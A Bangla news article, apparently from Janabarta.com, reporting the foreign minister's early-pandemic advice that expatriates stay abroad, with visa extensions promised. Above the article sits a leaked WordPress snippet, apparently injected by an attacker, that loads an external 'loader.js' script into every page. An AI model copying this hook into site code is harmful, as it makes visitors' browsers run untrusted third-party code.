// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site যারা যে দেশে আছেন সেখানেই থাকুন: পররাষ্ট্রমন্ত্রী - Janabarta.com

যারা যে দেশে আছেন সেখানেই থাকুন: পররাষ্ট্রমন্ত্রী

স্টাফ রিপোর্টারঃ মধ্যপ্রাচ্য থেকে যারা ছুটিতে এসে করোনাভাইরাসের কারণে দেশে আটকে গেছেন তাদের ভিসার মেয়াদ বাড়ানো হবে বলে জানিয়েছেন পররাষ্ট্রমন্ত্রী একে আবদুল মোমেন। 

বৃহস্পতিবার সন্ধ্যায় রাষ্ট্রীয় অতিথি ভবন পদ্মায় মধ্যপ্রাচ্যের পাঁচ দেশের রাষ্ট্রদূতের সঙ্গে বৈঠক শেষে সাংবাদিকদের একথা বলেন তিনি।

প্রবাসীদের এই মূহুর্তে দেশে না ফেরার আহ্বান জানিয়ে মন্ত্রী বলেন, এই মূহুর্তে দেশে না আসাই ভালো।  যদি দেশে আসতেই হয় তবে মনে রাখবেন, এখনে এসে ১৪ দিন কোয়ারেন্টাইনে থাকতে হবে, কারো সঙ্গে দেখা-সাক্ষাৎ করা যাবে না। 

তিনি বলেন, যারা যে দেশে আছেন, সে দেশেই থাকুন। সে দেশের আইন কানুন মানুন। কোনো কিছুর দরকার হলে দূতাবাসে যোগাযোগ করুন।

মন্ত্রী আরও বলেন, বাংলাদেশে করোনাভাইরাস এখনও তেমন প্রভাব বিস্তার করতে পারেনি। এখন পর্যন্ত ৩জন রোগী শনাক্ত হয়েছেন। তারা সুস্থ আছেন। তবে এটি যাতে আরও বিস্তৃত হতে না পারে সেজন্য স্বাস্থ্যমন্ত্রণালয় প্রয়োজনীয় সবকিছুই করবে। 

বিশ্বের অন্য কোনও দেশের নাগরিকদের ভিসা দেওয়া বন্ধ করা হবে কি না জানতে চাইলে ড. মোমেন বলেন, করোনা বেশি ছড়িয়েছে এমন চার দেশের (চীন, ইরান, ইতালি ও দক্ষিণ কোরিয়া) অ্যারাইভাল ভিসা বন্ধ করে রেখেছি।  তিনি বলেন, ভারত ফ্লাইট বন্ধ করেছে। ট্রেন ও বাসে ফিরে আসুন অথবা কিছুদিন ধৈর্য ধরে সেখানেই থাকুন।  

এসময় তিনি বলেন, মিডিয়ার কারণে কারোনাভাইরাস নিয়ে এতো আলোচনা হচ্ছে। আসলে এটি ততটা মারাত্মক নয়।  

এরআগে করোনাভাইরাস নিয়ে মধ্যপ্রাচ্যের পাঁচ দেশের রাষ্ট্রদূতের সঙ্গে বৈঠকে আরও উপস্থিত ছিলেন প্রবাসী কল্যাণ ও বৈদেশিক কর্মসংস্থান মন্ত্রী ইমরান আহমেদ এবং সৌদি আরব, কাতার, ইরাক, সংযুক্ত আরব আমিরাত ও কুয়েতের রাষ্ট্রদূতরা।